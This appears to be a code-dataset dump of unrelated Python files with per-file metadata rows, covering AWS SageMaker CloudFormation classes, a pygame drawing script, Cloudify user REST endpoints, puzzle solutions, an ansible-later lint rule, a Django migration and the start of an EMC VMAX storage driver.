`MonitoringExecutionSummary <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringexecutionsummary.html>`__
"""
props: PropsDictType = {
"CreationTime": (str, True),
"EndpointName": (str, False),
"FailureReason": (str, False),
"LastModifiedTime": (str, True),
"MonitoringExecutionStatus": (str, True),
"MonitoringScheduleName": (str, True),
"ProcessingJobArn": (str, False),
"ScheduledTime": (str, True),
}
class BaselineConfig(AWSProperty):
"""
`BaselineConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-baselineconfig.html>`__
"""
props: PropsDictType = {
"ConstraintsResource": (ConstraintsResource, False),
"StatisticsResource": (StatisticsResource, False),
}
class MonitoringAppSpecification(AWSProperty):
"""
`MonitoringAppSpecification <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringappspecification.html>`__
"""
props: PropsDictType = {
"ContainerArguments": ([str], False),
"ContainerEntrypoint": ([str], False),
"ImageUri": (str, True),
"PostAnalyticsProcessorSourceUri": (str, False),
"RecordPreprocessorSourceUri": (str, False),
}
class MonitoringInput(AWSProperty):
"""
`MonitoringInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringinput.html>`__
"""
props: PropsDictType = {
"EndpointInput": (EndpointInput, True),
}
class MonitoringJobDefinition(AWSProperty):
"""
`MonitoringJobDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringjobdefinition.html>`__
"""
props: PropsDictType = {
"BaselineConfig": (BaselineConfig, False),
"Environment": (dict, False),
"MonitoringAppSpecification": (MonitoringAppSpecification, True),
"MonitoringInputs": ([MonitoringInput], True),
"MonitoringOutputConfig": (MonitoringOutputConfig, True),
"MonitoringResources": (MonitoringResources, True),
"NetworkConfig": (NetworkConfig, False),
"RoleArn": (str, True),
"StoppingCondition": (StoppingCondition, False),
}
class ScheduleConfig(AWSProperty):
"""
`ScheduleConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-scheduleconfig.html>`__
"""
props: PropsDictType = {
"ScheduleExpression": (str, True),
}
class MonitoringScheduleConfig(AWSProperty):
"""
`MonitoringScheduleConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringscheduleconfig.html>`__
"""
props: PropsDictType = {
"MonitoringJobDefinition": (MonitoringJobDefinition, False),
"MonitoringJobDefinitionName": (str, False),
"MonitoringType": (str, False),
"ScheduleConfig": (ScheduleConfig, False),
}
class MonitoringSchedule(AWSObject):
"""
`MonitoringSchedule <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-monitoringschedule.html>`__
"""
resource_type = "AWS::SageMaker::MonitoringSchedule"
props: PropsDictType = {
"EndpointName": (str, False),
"FailureReason": (str, False),
"LastMonitoringExecutionSummary": (MonitoringExecutionSummary, False),
"MonitoringScheduleConfig": (MonitoringScheduleConfig, True),
"MonitoringScheduleName": (str, True),
"MonitoringScheduleStatus": (str, False),
"Tags": (Tags, False),
}
class NotebookInstance(AWSObject):
"""
`NotebookInstance <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-notebookinstance.html>`__
"""
resource_type = "AWS::SageMaker::NotebookInstance"
props: PropsDictType = {
"AcceleratorTypes": ([str], False),
"AdditionalCodeRepositories": ([str], False),
"DefaultCodeRepository": (str, False),
"DirectInternetAccess": (str, False),
"InstanceType": (str, True),
"KmsKeyId": (str, False),
"LifecycleConfigName": (str, False),
"NotebookInstanceName": (str, False),
"PlatformIdentifier": (str, False),
"RoleArn": (str, True),
"RootAccess": (str, False),
"SecurityGroupIds": ([str], False),
"SubnetId": (str, False),
"Tags": (Tags, False),
"VolumeSizeInGB": (integer, False),
}
class NotebookInstanceLifecycleHook(AWSProperty):
"""
`NotebookInstanceLifecycleHook <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-notebookinstancelifecycleconfig-notebookinstancelifecyclehook.html>`__
"""
props: PropsDictType = {
"Content": (str, False),
}
class NotebookInstanceLifecycleConfig(AWSObject):
"""
`NotebookInstanceLifecycleConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-notebookinstancelifecycleconfig.html>`__
"""
resource_type = "AWS::SageMaker::NotebookInstanceLifecycleConfig"
props: PropsDictType = {
"NotebookInstanceLifecycleConfigName": (str, False),
"OnCreate": ([NotebookInstanceLifecycleHook], False),
"OnStart": ([NotebookInstanceLifecycleHook], False),
}
class Pipeline(AWSObject):
"""
`Pipeline <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-pipeline.html>`__
"""
resource_type = "AWS::SageMaker::Pipeline"
props: PropsDictType = {
"PipelineDefinition": (dict, True),
"PipelineDescription": (str, False),
"PipelineDisplayName": (str, False),
"PipelineName": (str, True),
"RoleArn": (str, True),
"Tags": (Tags, False),
}
class Project(AWSObject):
"""
`Project <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-project.html>`__
"""
resource_type = "AWS::SageMaker::Project"
props: PropsDictType = {
"ProjectDescription": (str, False),
"ProjectName": (str, True),
"ServiceCatalogProvisioningDetails": (dict, True),
"Tags": (Tags, False),
}
class UserProfile(AWSObject):
"""
`UserProfile <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-userprofile.html>`__
"""
resource_type = "AWS::SageMaker::UserProfile"
props: PropsDictType = {
"DomainId": (str, True),
"SingleSignOnUserIdentifier": (str, False),
"SingleSignOnUserValue": (str, False),
"Tags": (Tags, False),
"UserProfileName": (str, True),
"UserSettings": (UserSettings, False),
}
class CognitoMemberDefinition(AWSProperty):
"""
`CognitoMemberDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-workteam-cognitomemberdefinition.html>`__
"""
props: PropsDictType = {
"CognitoClientId": (str, True),
"CognitoUserGroup": (str, True),
"CognitoUserPool": (str, True),
}
class MemberDefinition(AWSProperty):
"""
`MemberDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-workteam-memberdefinition.html>`__
"""
props: PropsDictType = {
"CognitoMemberDefinition": (CognitoMemberDefinition, True),
}
class NotificationConfiguration(AWSProperty):
"""
`NotificationConfiguration <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-workteam-notificationconfiguration.html>`__
"""
props: PropsDictType = {
"NotificationTopicArn": (str, True),
}
class Workteam(AWSObject):
"""
`Workteam <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-workteam.html>`__
"""
resource_type = "AWS::SageMaker::Workteam"
props: PropsDictType = {
"Description": (str, False),
"MemberDefinitions": ([MemberDefinition], False),
"NotificationConfiguration": (NotificationConfiguration, False),
"Tags": (Tags, False),
"WorkteamName": (str, False),
}
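# --- Hedged usage sketch (not part of the generated module) ---
# Assumes the troposphere Template API (Template, add_resource, to_json); the
# logical name, instance type and IAM role ARN below are invented examples.
if __name__ == "__main__":
    from troposphere import Template

    template = Template()
    template.add_resource(
        NotebookInstance(
            "ExampleNotebook",
            InstanceType="ml.t3.medium",
            RoleArn="arn:aws:iam::123456789012:role/ExampleSageMakerRole",
        )
    )
    # Required props (InstanceType, RoleArn) are checked against the props dict above.
    print(template.to_json())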
| 32.207761 | 206 | 0.680681 | 3,016 | 39,841 | 8.922082 | 0.106432 | 0.029433 | 0.038017 | 0.058754 | 0.457096 | 0.407745 | 0.395295 | 0.377978 | 0.366606 | 0.36066 | 0 | 0.001101 | 0.179363 | 39,841 | 1,236 | 207 | 32.233819 | 0.82193 | 0.351422 | 0 | 0.35814 | 1 | 0 | 0.235617 | 0.097267 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.003101 | 0 | 0.328682 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4843692979b67bbb7eade27d08ade8ca10f18066 | 2,012 | py | Python | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | # today is 389f
# the python pit
# magPi - 05
# MOUNTAINS
import os, pygame; from pygame.locals import *
pygame.init(); clock = pygame.time.Clock()
os.environ['SDL_VIDEO_WINDOW_POS'] = 'center'
pygame.display.set_caption("Mountains")
screen=pygame.display.set_mode([600,382],0,32)
sky = pygame.Surface((600,255))
r=0; g=64; b=128
for l in range (0,255):
pygame.draw.rect(sky,(r,g,b),(0,l-1,600,l))
r=r+1;g=g+1;b=b+1
if r>=255: r=255
if g>=255: g=255
if b>=255: b=255
ground = pygame.Surface((600,128))
r=192; g=255; b=192
for l in range (0,128):
pygame.draw.rect(ground,(r,g,b),(0,l-2,600,l))
r=r-2;g=g-2;b=b-2
if r<=0: r=0
if g<=0: g=0
if b<=0: b=0
# Add in an extra surface for the mountains
mountain = pygame.Surface((600,128))
mountain.set_colorkey([0,0,0]) # Black is transparent
r=96; g=64; b=255
for l in range (0,128):
pygame.draw.rect(mountain,(r,g,b),(0,l-2,600,l))
r=r+2;g=g+2;b=b+2
if r>=255: r=255
if g>=255: g=255
if b>=255: b=255
# Draw some black (Transparent) polygons to create mountain peaks
# The screen is 600 wide so I've drawn 10 polygons at 60 pixels wide each
pygame.draw.polygon(mountain,[0,0,0],[(0,0),(60,0),(60,10),(0,40)])
pygame.draw.polygon(mountain,[0,0,0],[(60,0),(120,0),(120,30),(60,10)])
pygame.draw.polygon(mountain,[0,0,0],[(120,0),(180,0),(180,20),(120,30)])
pygame.draw.polygon(mountain,[0,0,0],[(180,0),(240,0),(240,50),(180,20)])
pygame.draw.polygon(mountain,[0,0,0],[(240,0),(300,0),(300,40),(240,50)])
pygame.draw.polygon(mountain,[0,0,0],[(300,0),(360,0),(360,10),(300,40)])
pygame.draw.polygon(mountain,[0,0,0],[(360,0),(420,0),(420,35),(360,10)])
pygame.draw.polygon(mountain,[0,0,0],[(420,0),(480,0),(480,45),(420,35)])
pygame.draw.polygon(mountain,[0,0,0],[(480,0),(540,0),(540,42),(480,45)])
pygame.draw.polygon(mountain,[0,0,0],[(540,0),(600,0),(600,15),(540,42)])
screen.blit(sky,(0,0))
screen.blit(ground,(0,255))
screen.blit(mountain,(0,128))
pygame.display.update()
pygame.time.wait(30000) | 34.101695 | 73 | 0.638171 | 416 | 2,012 | 3.072115 | 0.228365 | 0.039124 | 0.030516 | 0.195618 | 0.369327 | 0.349765 | 0.349765 | 0.21831 | 0.124413 | 0.07903 | 0 | 0.2 | 0.107853 | 2,012 | 59 | 74 | 34.101695 | 0.511978 | 0.12326 | 0 | 0.177778 | 0 | 0 | 0.019932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022222 | 0 | 0.022222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4847f5739e2a2a4fe3f2279bc69fc734031f35e3 | 5,610 | py | Python | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | #########
# Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from flask_security import current_user
from manager_rest import constants
from manager_rest.storage import models, user_datastore
from manager_rest.security.authorization import authorize
from manager_rest.security import (SecuredResource,
MissingPremiumFeatureResource)
from manager_rest.manager_exceptions import BadParametersError
from .. import rest_decorators, rest_utils
from ..responses_v3 import UserResponse
try:
from cloudify_premium.multi_tenancy.secured_tenant_resource \
import SecuredMultiTenancyResource
except ImportError:
SecuredMultiTenancyResource = MissingPremiumFeatureResource
class User(SecuredResource):
@authorize('user_get_self')
@rest_decorators.marshal_with(UserResponse)
def get(self):
"""
Get details for the current user
"""
return user_datastore.get_user(current_user.username)
class Users(SecuredMultiTenancyResource):
@authorize('user_list')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.create_filters(models.User)
@rest_decorators.paginate
@rest_decorators.sortable(models.User)
@rest_decorators.search('username')
def get(self, multi_tenancy, _include=None, filters=None, pagination=None,
sort=None, search=None, **kwargs):
"""
List users
"""
return multi_tenancy.list_users(
_include,
filters,
pagination,
sort,
search
)
@authorize('user_create')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.no_external_authenticator('create user')
def put(self, multi_tenancy):
"""
Create a user
"""
request_dict = rest_utils.get_json_and_verify_params(
{
'username': {
'type': unicode,
},
'password': {
'type': unicode,
},
'role': {
'type': unicode,
'optional': True,
},
}
)
# The password shouldn't be validated here
password = request_dict.pop('password')
password = rest_utils.validate_and_decode_password(password)
rest_utils.validate_inputs(request_dict)
role = request_dict.get('role', constants.DEFAULT_SYSTEM_ROLE)
rest_utils.verify_role(role, is_system_role=True)
return multi_tenancy.create_user(
request_dict['username'],
password,
role,
)
class UsersId(SecuredMultiTenancyResource):
@authorize('user_update')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Set password/role for a certain user
"""
request_dict = rest_utils.get_json_and_verify_params()
password = request_dict.get('password')
role_name = request_dict.get('role')
if password:
if role_name:
raise BadParametersError('Both `password` and `role` provided')
password = rest_utils.validate_and_decode_password(password)
return multi_tenancy.set_user_password(username, password)
elif role_name:
rest_utils.verify_role(role_name, is_system_role=True)
return multi_tenancy.set_user_role(username, role_name)
else:
raise BadParametersError('Neither `password` nor `role` provided')
@authorize('user_get')
@rest_decorators.marshal_with(UserResponse)
def get(self, username, multi_tenancy):
"""
Get details for a single user
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.get_user(username)
@authorize('user_delete')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.no_external_authenticator('delete user')
def delete(self, username, multi_tenancy):
"""
Delete a user
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.delete_user(username)
class UsersActive(SecuredMultiTenancyResource):
@authorize('user_set_activated')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Activate a user
"""
request_dict = rest_utils.get_json_and_verify_params({'action'})
if request_dict['action'] == 'activate':
return multi_tenancy.activate_user(username)
else:
return multi_tenancy.deactivate_user(username)
class UsersUnlock(SecuredMultiTenancyResource):
@authorize('user_unlock')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Unlock user account
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.unlock_user(username)
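# --- Hedged example (not part of the original resource) ---
# The JSON body that Users.put above validates; the values are invented and the
# role falls back to constants.DEFAULT_SYSTEM_ROLE when omitted.
EXAMPLE_CREATE_USER_BODY = {
    'username': 'alice',
    'password': 'CorrectHorseBatteryStaple1!',
    'role': 'sys_admin',  # optional
}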
| 34.207317 | 79 | 0.659893 | 595 | 5,610 | 5.984874 | 0.287395 | 0.057287 | 0.045493 | 0.056164 | 0.305251 | 0.276327 | 0.276327 | 0.242909 | 0.18843 | 0.172423 | 0 | 0.002149 | 0.253476 | 5,610 | 163 | 80 | 34.417178 | 0.848138 | 0.145633 | 0 | 0.198113 | 0 | 0 | 0.067815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075472 | false | 0.09434 | 0.09434 | 0 | 0.311321 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
48514c4855c82f6511561bc091163063091c1e9c | 664 | py | Python | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | 1 | 2020-09-24T10:38:53.000Z | 2020-09-24T10:38:53.000Z | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | null | null | null | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Description
"""
import torch
from ptranking.ltr_global import global_gpu as gpu
def get_one_hot_reprs(batch_stds):
""" Get one-hot representation of batch ground-truth labels """
batch_size = batch_stds.size(0)
hist_size = batch_stds.size(1)
int_batch_stds = batch_stds.type(torch.cuda.LongTensor) if gpu else batch_stds.type(torch.LongTensor)
hot_batch_stds = torch.cuda.FloatTensor(batch_size, hist_size, 3) if gpu else torch.FloatTensor(batch_size, hist_size, 3)
hot_batch_stds.zero_()
hot_batch_stds.scatter_(2, torch.unsqueeze(int_batch_stds, 2), 1)
return hot_batch_stds
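# --- Hedged usage sketch (not part of the original module) ---
# A tiny fabricated CPU example; labels must lie in {0, 1, 2} because the
# function above hard-codes three one-hot slots per label.
if __name__ == '__main__':
    fake_stds = torch.FloatTensor([[0, 2, 1]])  # shape [batch_size=1, hist_size=3]
    print(get_one_hot_reprs(fake_stds))
    # expected rows: [1, 0, 0], [0, 0, 1], [0, 1, 0]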
| 30.181818 | 125 | 0.74247 | 105 | 664 | 4.409524 | 0.428571 | 0.213823 | 0.103672 | 0.073434 | 0.12527 | 0.12527 | 0 | 0 | 0 | 0 | 0 | 0.014109 | 0.146084 | 664 | 21 | 126 | 31.619048 | 0.802469 | 0.167169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
485f7ffc14de09acdf65c094b7c9e15395d4ca1b | 1,001 | py | Python | problems/095.py | JoshKarpel/Euler | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | 1 | 2017-09-20T22:26:24.000Z | 2017-09-20T22:26:24.000Z | problems/095.py | JoshKarpel/euler-python | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | null | null | null | problems/095.py | JoshKarpel/euler-python | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | null | null | null | from problems import utils, mymath
@utils.memoize
def sum_proper_factors(n):
return sum(mymath.proper_factorization(n))
def solve():
upper_bound = 1000000
chains = dict()
for start_number in range(1, upper_bound):
chain = [start_number]
current_number = sum_proper_factors(start_number)
while current_number != start_number:
if current_number > upper_bound or current_number == 0 or len(chain) > 100:
break
elif current_number in chains:
chain += chains[current_number]
break
else:
chain.append(current_number)
current_number = sum_proper_factors(current_number)
if current_number == start_number:
chains[start_number] = chain
chain_lengths = {i: len(chains[i]) for i in chains}
max_key = mymath.key_of_max_value(chain_lengths)
return min(chains[max_key])
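# Hedged illustration (not part of the original solution): a self-contained
# proper-divisor sum, independent of the project-local mymath helpers, plus the
# chain quoted in the problem statement:
# 12496 -> 14288 -> 15472 -> 14536 -> 14264 -> 12496 (length 5).
def _proper_divisor_sum(n):
    return sum(d for d in range(1, n // 2 + 1) if n % d == 0)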
if __name__ == '__main__':
print(solve())
| 26.342105 | 87 | 0.632368 | 122 | 1,001 | 4.852459 | 0.385246 | 0.219595 | 0.081081 | 0.074324 | 0.118243 | 0.118243 | 0 | 0 | 0 | 0 | 0 | 0.016807 | 0.286713 | 1,001 | 37 | 88 | 27.054054 | 0.812325 | 0 | 0 | 0.076923 | 0 | 0 | 0.007992 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.038462 | 0.038462 | 0.192308 | 0.038462 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4868d79bbf2ff6bbae4f4cb4d9abf9fab912436f | 724 | py | Python | ansiblelater/rules/CheckScmInSrc.py | ankitdobhal/ansible-later | a107cd2821e310fd459a7f9b802d5794f2b96f35 | [
"MIT"
] | 38 | 2020-10-14T09:40:58.000Z | 2022-03-17T10:45:22.000Z | ansiblelater/rules/CheckScmInSrc.py | ankitdobhal/ansible-later | a107cd2821e310fd459a7f9b802d5794f2b96f35 | [
"MIT"
] | 188 | 2020-09-29T09:43:54.000Z | 2022-03-04T08:45:42.000Z | ansiblelater/rules/CheckScmInSrc.py | ankitdobhal/ansible-later | a107cd2821e310fd459a7f9b802d5794f2b96f35 | [
"MIT"
] | 4 | 2021-02-10T03:35:19.000Z | 2022-01-17T15:54:39.000Z | from ansible.parsing.yaml.objects import AnsibleMapping
from ansiblelater.standard import StandardBase
class CheckScmInSrc(StandardBase):
sid = "ANSIBLE0005"
description = "Use `scm:` key rather than `src: scm+url`"
helptext = "usage of `src: scm+url` not recommended"
version = "0.1"
types = ["rolesfile"]
def check(self, candidate, settings):
roles, errors = self.get_tasks(candidate, settings)
if not errors:
for role in roles:
if isinstance(role, AnsibleMapping):
if "+" in role.get("src"):
errors.append(self.Error(role["__line__"], self.helptext))
return self.Result(candidate.path, errors)
| 30.166667 | 82 | 0.627072 | 81 | 724 | 5.54321 | 0.641975 | 0.026726 | 0.040089 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011257 | 0.263812 | 724 | 23 | 83 | 31.478261 | 0.831144 | 0 | 0 | 0 | 0 | 0 | 0.15884 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
486936b454230e71425f5f21ffabf8c3b40a119e | 595 | py | Python | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | 3 | 2021-05-15T08:18:09.000Z | 2021-05-17T04:41:57.000Z | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | null | null | null | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | null | null | null | quarter=int(input())
p1=int(input())
p2=int(input())
p3=int(input())
time=0
while quarter>0:
if quarter == 0:
continue
p1+=1
quarter-=1
time+=1
if p1==35:
quarter+=30
p1=0
if quarter == 0:
continue
time+=1
p2+=1
quarter-=1
if p2==100:
p2=0
quarter+=60
if quarter == 0:
continue
p3+=1
time+=1
quarter-=1
if p3==10:
quarter+=9
p3=0
print(f'Martha plays {time} times before going broke.')
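# Hedged recap (not part of the original solution, derived from the loop above):
# machine 1 pays 30 quarters after every 35th play, machine 2 pays 60 after every
# 100th play, machine 3 pays 9 after every 10th play; `time` counts total plays.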
| 16.081081 | 56 | 0.438655 | 77 | 595 | 3.38961 | 0.337662 | 0.122605 | 0.114943 | 0.206897 | 0.145594 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122024 | 0.435294 | 595 | 37 | 57 | 16.081081 | 0.654762 | 0 | 0 | 0.387097 | 0 | 0 | 0.080357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4869a5e537b1616b1387d41f76532922834d0c3e | 327 | py | Python | project/app/migrations/0003_auto_20210125_0924.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | project/app/migrations/0003_auto_20210125_0924.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | project/app/migrations/0003_auto_20210125_0924.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 3.1.5 on 2021-01-25 16:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0002_auto_20210124_0610'),
]
operations = [
migrations.RenameModel(
old_name='Parent',
new_name='Account',
),
]
| 18.166667 | 47 | 0.590214 | 36 | 327 | 5.222222 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134783 | 0.296636 | 327 | 17 | 48 | 19.235294 | 0.682609 | 0.137615 | 0 | 0 | 1 | 0 | 0.139286 | 0.082143 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
486abe98f15277d75707a2bda0dddf48de43bab7 | 28,203 | py | Python | cinder/volume/drivers/emc/emc_vmax_provision.py | kazum/cinder | 370b8e60c3166b289c8da924a227dd1bc63f8b8a | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/emc/emc_vmax_provision.py | kazum/cinder | 370b8e60c3166b289c8da924a227dd1bc63f8b8a | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/emc/emc_vmax_provision.py | kazum/cinder | 370b8e60c3166b289c8da924a227dd1bc63f8b8a | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2012 - 2014 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from cinder import exception
from cinder.i18n import _, _LE
from cinder.openstack.common import log as logging
from cinder.volume.drivers.emc import emc_vmax_utils
LOG = logging.getLogger(__name__)
STORAGEGROUPTYPE = 4
POSTGROUPTYPE = 3
EMC_ROOT = 'root/emc'
THINPROVISIONINGCOMPOSITE = 32768
THINPROVISIONING = 5
class EMCVMAXProvision(object):
"""Provisioning Class for SMI-S based EMC volume drivers.
This Provisioning class is for EMC volume drivers based on SMI-S.
It supports VMAX arrays.
"""
def __init__(self, prtcl):
self.protocol = prtcl
self.utils = emc_vmax_utils.EMCVMAXUtils(prtcl)
def delete_volume_from_pool(
self, conn, storageConfigservice, volumeInstanceName, volumeName):
"""Given the volume instance remove it from the pool.
        :param conn: the connection to the ecom server
        :param storageConfigservice: the storage configuration service
:param volumeInstanceName: the volume instance name
:param volumeName: the volume name (String)
        :returns: rc - return code
"""
rc, job = conn.InvokeMethod(
'EMCReturnToStoragePool', storageConfigservice,
TheElements=[volumeInstanceName])
if rc != 0L:
